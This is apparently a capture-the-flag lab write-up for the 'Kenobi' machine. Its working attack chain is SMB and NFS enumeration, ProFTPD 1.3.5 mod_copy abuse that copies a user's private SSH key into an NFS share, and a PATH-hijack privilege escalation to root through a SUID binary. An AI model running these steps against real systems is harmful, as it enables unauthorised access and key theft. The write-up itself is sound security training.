Enumeration
Let’s start by enumerating open ports:
root@osboxes:~/Documents/Kenobi# cat scan.txt
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,21,445,80,139,2049,111,37299,47695,50169,50921
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33723/tcp6 mountd
| 100005 1,2,3 39241/udp mountd
| 100005 1,2,3 50169/tcp mountd
| 100005 1,2,3 52651/udp6 mountd
| 100021 1,3,4 36429/tcp6 nlockmgr
| 100021 1,3,4 36449/udp nlockmgr
| 100021 1,3,4 37299/tcp nlockmgr
| 100021 1,3,4 38700/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
37299/tcp open nlockmgr 1-4 (RPC #100021)
47695/tcp open mountd 1-3 (RPC #100005)
50169/tcp open mountd 1-3 (RPC #100005)
50921/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2020-08-01T21:39:14-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-02T02:39:14
|_ start_date: N/A
[*] Execution time:
TTL: 0
Furious: 15
Nmap: 16
Total: 31
Intrussion
The port 139 and 445 are open so dumped SMB data to local:
root@osboxes:~/Documents/Kenobi# crackmapexec smb 10.10.110.130 -u "" -p "" -M spider_plus -o READ_ONLY="False"
SMB 10.10.110.130 445 KENOBI [*] Windows 6.1 (name:KENOBI) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.110.130 445 KENOBI [+] \:
SPIDER_P... 10.10.110.130 445 KENOBI [*] Started spidering plus with option:
SPIDER_P... 10.10.110.130 445 KENOBI [*] DIR: ['print$']
SPIDER_P... 10.10.110.130 445 KENOBI [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.110.130 445 KENOBI [*] SIZE: 51200
SPIDER_P... 10.10.110.130 445 KENOBI [*] OUTPUT: /tmp/cme_spider_plus
root@osboxes:~/Documents/Kenobi# mv /tmp/cme_spider_plus/10.10.110.130 .
root@osboxes:~/Documents/Kenobi# tree 10.10.110.130/
10.10.110.130/
└── anonymous
└── log.txt
1 directory, 1 file
There is only a file named log.txt.According to the log a private key was generated for the user kenobi:
root@osboxes:~/Documents/Kenobi# head 10.10.110.130/anonymous/log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
It has also NFS open (port 2049), so listed all available mounts:
root@osboxes:~/Documents/Kenobi# showmount -e 10.10.110.130
Export list for 10.10.110.130:
/var *
Mounted the remote directory in my local host:
root@osboxes:~/Documents/Kenobi# mkdir var
root@osboxes:~/Documents/Kenobi# mount -t nfs 10.10.110.130:/var ./var/
It has also an ftp. However it is using ProFTP which looks suspicous. After checking on exploit-db there are a bunch of exploits (including ones for the version that the target is using).
root@osboxes:~/Documents/Kenobi# searchsploit proftp
---------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------- ---------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution | freebsd/remote/18181.txt
ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit) | windows/remote/16709.rb
ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit) | windows/remote/9508.rb
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow | linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass | multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) | linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service | linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) | linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) | linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) | linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root | linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service | linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage | linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration | linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force | linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun | linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection | linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) | linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) | linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service | linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection | multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow | unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) | linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) | linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) | linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow | linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) | linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution | linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Ove | linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Ove | linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expa | linux/remote/20690.sh
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is a vulnerability that allows file copy so downloaded it:
root@osboxes:~/Documents/Kenobi# searchsploit -m 36742
Exploit: ProFTPd 1.3.5 - File Copy
URL: https://www.exploit-db.com/exploits/36742
Path: /usr/share/exploitdb/exploits/linux/remote/36742.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /root/Documents/Kenobi/36742.txt
The CVE file contains information about how to exploit it (you can read it using the browser too):
We already knew that we have access to /var through NFS and that there is a private ssh key located at /home/kenobi/.ssh/id_rsa so just copy it:
root@osboxes:~/Documents/Kenobi# rlwrap nc 10.10.110.130 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.110.130]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
CPFR <sp> pathname
CPTO <sp> pathname
HELP
CHGRP
CHMOD
214 Direct comments to root@kenobi
site CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site CPTO /var/tmp/id_rsa
250 Copy successful
Now let’s copy the private key out of the NFS directory, assign it the right permissions to be able to use it with ssh and connect:
root@osboxes:~/Documents/Kenobi# cp ./var/tmp/id_rsa .
root@osboxes:~/Documents/Kenobi# chmod 600 id_rsa
root@osboxes:~/Documents/Kenobi# ssh -i id_rsa kenobi@10.10.110.130
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$
Privesc
Checked the SUID permissions and found an interesting binary:
kenobi@kenobi:~$ find / -perm /4000 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
Checked what /usr/bin/menu does using strings:
kenobi@kenobi:~$ strings /usr/bin/menu | head -n 25
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
The binary is calling other programs with a relative path so we can do a PATH hijacking attack:
kenobi@kenobi:~$ echo "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'" > ifconfig
kenobi@kenobi:~$ chmod +x ifconfig
kenobi@kenobi:~$ export PATH=/home/kenobi/:$PATH
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:~# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
